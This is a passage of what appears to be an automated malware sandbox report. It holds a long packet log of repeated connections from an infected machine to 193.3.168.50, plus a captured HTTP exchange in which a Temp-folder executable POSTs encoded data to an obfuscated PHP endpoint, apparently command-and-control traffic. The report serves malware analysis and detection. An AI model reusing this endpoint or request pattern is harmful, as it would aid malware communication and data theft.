                                                                                                                  Dec 5, 2024 10:54:35.417385101 CET8049885193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:35.417637110 CET4988580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:35.417653084 CET4989080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:35.417795897 CET4989080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:35.418483973 CET8049887193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:35.418556929 CET4988780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:35.537471056 CET8049890193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:35.810736895 CET4989080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:35.930720091 CET8049890193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:36.661237955 CET8049890193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:36.705791950 CET4989080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:36.893187046 CET8049890193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:36.940172911 CET4989080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:37.016288042 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:37.136054039 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:37.136122942 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:37.136306047 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:37.256185055 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:37.487129927 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:37.606946945 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:38.377856970 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:38.424552917 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.613437891 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:38.658910036 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.734179020 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.734474897 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.854379892 CET8049895193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:38.854393005 CET8049901193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:38.854439020 CET4989580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.854494095 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.854660034 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:38.974884033 CET8049901193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:39.206872940 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.326673985 CET8049901193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:39.878719091 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.878743887 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.998595953 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.998631954 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:39.998816013 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.998816967 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:39.998827934 CET8049901193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:39.998924971 CET4990180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:40.118397951 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:40.118561029 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:40.118938923 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:40.122859955 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:40.242625952 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:40.346879959 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:40.466850996 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:40.466936111 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:40.476926088 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:40.596898079 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.236069918 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.283915997 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.356594086 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.408940077 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.469062090 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.518285990 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.588990927 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.643316031 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.708440065 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.708466053 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.708894968 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.828720093 CET8049909193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.828790903 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.829008102 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.831865072 CET8049906193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.831904888 CET8049907193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:41.831921101 CET4990680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.831945896 CET4990780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:41.948712111 CET8049909193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:42.174653053 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:42.294801950 CET8049909193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:43.067507982 CET8049909193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:43.109121084 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:43.301377058 CET8049909193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:43.346432924 CET4990980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:43.425920010 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:43.545669079 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:43.545769930 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:43.545988083 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:43.665745020 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:43.929065943 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:44.048831940 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:44.791619062 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:44.846426010 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.051865101 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:45.096436977 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.173661947 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.173868895 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.293642044 CET8049921193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:45.293709993 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.293869019 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.293927908 CET8049915193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:45.293970108 CET4991580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.413681030 CET8049921193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:45.643388033 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:45.834358931 CET8049921193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:46.475893974 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.476365089 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.531136036 CET8049921193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:46.534207106 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.595797062 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:46.595881939 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.596348047 CET8049921193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:46.596430063 CET4992180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.743530989 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:46.863260984 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.098803997 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.219338894 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.219352007 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.308856964 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.428689957 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.428767920 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.428898096 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.548547029 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.784110069 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.836030960 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:47.877685070 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:47.904010057 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:48.068979979 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:48.115262032 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:48.669554949 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:48.724849939 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:48.905261040 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:48.955797911 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.034586906 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.034656048 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.034909010 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.154620886 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:49.154690027 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.154870987 CET8049926193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:49.154923916 CET4992680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.155143023 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.155296087 CET8049928193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:49.155343056 CET4992880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.274992943 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:49.523631096 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:49.643599987 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:50.396166086 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:50.440176010 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.629112005 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:50.629447937 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.749583960 CET8049934193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:50.749650955 CET4993480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.751874924 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.871639013 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:50.871763945 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.871925116 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:50.991636038 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:51.221606016 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:51.341970921 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:52.109564066 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:52.174552917 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.345233917 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:52.396374941 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.590723038 CET4994280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.590724945 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.710592031 CET8049942193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:52.710942984 CET8049939193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:52.712915897 CET4993980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.716839075 CET4994280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.741838932 CET4994280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:52.861553907 CET8049942193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:53.081927061 CET4994280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:53.082511902 CET4994680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:53.202554941 CET8049946193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:53.202641964 CET4994680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:53.219307899 CET4994680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:53.245168924 CET8049942193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:53.247526884 CET4994780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:53.339032888 CET8049946193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:53.367212057 CET8049947193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:53.367279053 CET4994780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:53.367682934 CET4994780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:53.487507105 CET8049947193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:53.565650940 CET4994680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:53.684061050 CET8049942193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:53.684118986 CET4994280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:53.685431957 CET8049946193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:53.685529947 CET8049946193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:53.721549988 CET4994780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:53.841303110 CET8049947193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:54.440152884 CET8049946193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:54.565224886 CET4994680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:54.605053902 CET8049947193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:54.673150063 CET8049946193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:54.752716064 CET4994680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:54.837070942 CET8049947193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:54.841217041 CET4994780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:54.969918966 CET4994680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:54.970304012 CET4994780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:54.970767975 CET4995180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:55.090090990 CET8049946193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:55.090167046 CET4994680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:55.090461016 CET8049947193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:55.090487957 CET8049951193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:55.090513945 CET4994780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:55.090569019 CET4995180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:55.090745926 CET4995180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:55.210592031 CET8049951193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:55.576205969 CET4995180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:55.696055889 CET8049951193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:56.332887888 CET8049951193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:56.564897060 CET8049951193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:56.565013885 CET4995180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:56.688020945 CET4995180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:56.688024044 CET4995580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:56.808011055 CET8049955193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:56.808253050 CET8049951193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:56.808288097 CET4995580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:56.808407068 CET4995580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:56.808459997 CET4995180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:56.928522110 CET8049955193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:57.159410954 CET4995580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:57.279233932 CET8049955193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:58.047489882 CET8049955193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:58.159185886 CET4995580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:58.281289101 CET8049955193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:58.362087965 CET4995580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:59.054778099 CET4996180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:59.175225019 CET8049961193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:59.175306082 CET4996180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:59.176068068 CET4996180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:59.295774937 CET8049961193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:59.534157038 CET4996180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:59.655206919 CET8049961193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:59.691337109 CET4996180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:59.691386938 CET4996680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:59.811213970 CET8049966193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:59.811290979 CET4996680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:59.811508894 CET4996680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:59.819211006 CET4996780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:59.857191086 CET8049961193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:59.931225061 CET8049966193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:59.939230919 CET8049967193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:59.939307928 CET4996780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:59.939574003 CET4996780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:55:00.059801102 CET8049967193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:55:00.152484894 CET8049961193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:55:00.152616978 CET4996180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:55:00.160885096 CET4996680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:55:00.280970097 CET8049966193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:55:00.280982971 CET8049966193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:55:00.284395933 CET4996780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:55:00.404241085 CET8049967193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:55:01.052923918 CET8049966193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:55:01.177547932 CET8049967193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:55:01.179377079 CET4996680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:55:01.285175085 CET8049966193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:55:01.330825090 CET4996780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:55:01.413055897 CET8049967193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:55:01.443478107 CET4996680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:55:01.643321991 CET4996780192.168.2.4193.3.168.50

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • 193.3.168.50

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.449734193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:16.710395098 CET440OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 344
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:17.066200972 CET344OUTData Raw: 00 0a 01 06 06 0c 04 05 05 06 02 01 02 0c 01 03 00 0b 05 09 02 00 03 09 00 54 0f 54 04 03 01 06 0f 01 04 0d 01 05 03 06 0e 0a 05 00 07 51 07 02 06 06 0b 09 0c 0f 04 06 05 04 05 02 05 04 06 09 01 02 0d 5e 07 03 05 06 0d 57 0c 57 0c 04 0e 04 02 07
                                                                                                                  Data Ascii: TTQ^WWURTU\L}Pk^Xcbb^aKZ|b\tUlsQYxolcuZ|n|wgkZiO~V@x}PN~ru
                                                                                                                  Dec 5, 2024 10:53:17.935105085 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:17.949781895 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 35 36 63 0d 0a 56 4a 7e 01 6f 6d 5a 5e 78 71 7f 5c 7f 58 67 00 7d 49 63 4f 7f 60 79 0a 79 05 74 04 7d 5c 73 59 63 63 7d 0d 6e 72 61 01 77 75 67 5f 7c 71 78 01 55 4b 72 50 74 4c 67 02 6b 5c 6a 5e 7c 49 5f 51 78 66 70 41 7d 05 7f 03 75 04 69 4c 63 58 76 5a 68 07 62 03 6a 6c 5e 4e 7f 64 60 59 77 76 7b 06 7c 5c 75 00 7e 06 6a 5f 79 67 7c 4c 7b 77 63 59 6c 53 60 5b 6d 71 78 04 6c 60 7d 5b 7f 59 77 5e 6f 67 60 03 7d 4c 6c 5f 76 62 78 48 7a 51 41 5b 7c 67 6b 55 68 61 7a 54 62 55 6f 5e 7b 55 78 48 74 4e 75 54 6e 71 6e 59 7e 7c 71 5d 6f 61 66 00 77 73 52 5e 75 61 6c 04 60 07 7a 50 7e 5d 79 5f 77 62 6d 04 61 65 55 50 7e 6f 76 5c 60 6f 6c 04 7f 70 7c 07 78 6c 5d 03 6c 5e 66 00 6b 6d 5a 08 77 01 7f 5f 69 61 7d 50 69 53 5e 50 78 43 6e 04 7e 72 7a 5e 7b 5d 46 51 68 7c 7c 40 7d 70 64 0c 6a 49 6e 05 7b 43 51 01 6c 5b 64 46 6b 62 7c 59 7d 64 70 54 68 60 75 42 7b 63 70 4d 69 04 78 03 77 05 65 51 7b 5c 79 06 76 66 64 00 7d 66 68 04 7d 48 75 41 74 62 77 02 7f 5c 53 01 7f 77 62 0d 7b 48 52 0a 7d 73 59 00 76 4c 6d 4e 77 [TRUNCATED]
                                                                                                                  Data Ascii: 56cVJ~omZ^xq\Xg}IcO`yyt}\sYcc}nrawug_|qxUKrPtLgk\j^|I_QxfpA}uiLcXvZhbjl^Nd`Ywv{|\u~j_yg|L{wcYlS`[mqxl`}[Yw^og`}Ll_vbxHzQA[|gkUhazTbUo^{UxHtNuTnqnY~|q]oafwsR^ual`zP~]y_wbmaeUP~ov\`olp|xl]l^fkmZw_ia}PiS^PxCn~rz^{]FQh||@}pdjIn{CQl[dFkb|Y}dpTh`uB{cpMixweQ{\yvfd}fh}HuAtbw\Swb{HR}sYvLmNwO_HOjH}Bp@w{wawxri|p[{gZxgxxSwybd{]fNZIxYd}rua^H~RcI|A}au@w|ZLx|Rv`zyae||rO{qjwsUJuOtNt_r|pz@wbqv[x|BeBv|xshI{Rg{^TIC`vg|O}LT|m]{}fL}raNh@l^~pp}YTNxCgxLxH~a{~w]@Nezc|}r`Ft]uO{aivHZH}Xt~HyOvr|baMYrxXhO~Mcu\Svq}GO~I|twuagJxb_I}^iywhyg`{}sxr|zs\{]NZydx}b^_va{]io|Z|gtO|a}NaR^oRcXtsb@zbejl~_z\y\}b`g{ZL~JxYbMtaiBbu|B~ouBw|o^scZyosyZ~lN`Yl~\[SzSYQfn^jfzScTdpT|cOaq@on`_l[wS}`gPdNSzSWsYSxXutzQmbib_`J}fVN~v[wLx[rykgWU{XlO|`wGv\_cvqTLy_joNR{d]YbVV[nHWcnIRppY^@x}kDzb|Ky]~O}wp@^Q_QtD\bQ@QTXSkc{_[PlUo|~]GZYDPxv~^ioAW}e_Y`U[XcXXbLx^\^m[nqwUNRUC\u{s[k`DTp`\TcUQToWXdCaSij|R [TRUNCATED]
